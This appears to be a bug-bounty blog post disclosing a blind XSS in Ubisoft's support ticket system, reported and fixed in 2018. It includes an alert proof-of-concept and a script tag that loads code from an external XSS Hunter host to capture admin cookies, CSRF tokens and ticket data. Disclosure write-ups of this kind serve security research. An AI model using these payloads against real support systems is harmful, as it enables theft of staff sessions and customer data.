UBISOFT | BLIND XSS TO CUSTOMER SUPPORT PANEL TAKEOVER





hey folks! hope y'all great , i recently found a XSS in support.ubisoft.com which lead  the attacker to takeover customer support panel :

Vulnerability : Cross Site Scripting

Identifying Vulnerability :

While i was facing a problem in Wd2 I goto know about http://support.ubi.com , I opened a ticket for that ,and i got the idea of why not test it out for xss  i send the following payload  :
 <script>alert("XSS POC BY HX01");</script>  
and boom!


Exploitation :

since the webapp was vulnerable to xss i added an payload from xsshunter.com  to steal the Admin Cookies,CSRF token etc :
"><script src=https://usociety.xss.ht></script>
now time to make the victim visit the url:


since some of the admin cookies were httponly i wasn't able to login into it but however due to xsshunter i was able to get the Ip,CSRF token(which could have lead to compromise agent)& some tickets information,some players id due to another xss trigger :
Reported the bug to salesforce since the xss triggered at salesforce domain,however it turned out to be a bug from ubisoft side with the salesforce mitigation bug was patched :


Timeline :


  • Report Sent @24/04/2018
  • Bug  Fixed @27/04/2018

Comments

Post a Comment

Popular posts from this blog

HTML injection to SSRF

MANGOBAAZ HACKED | XSS TO CREDENTIALS EXPOSURE TO PWN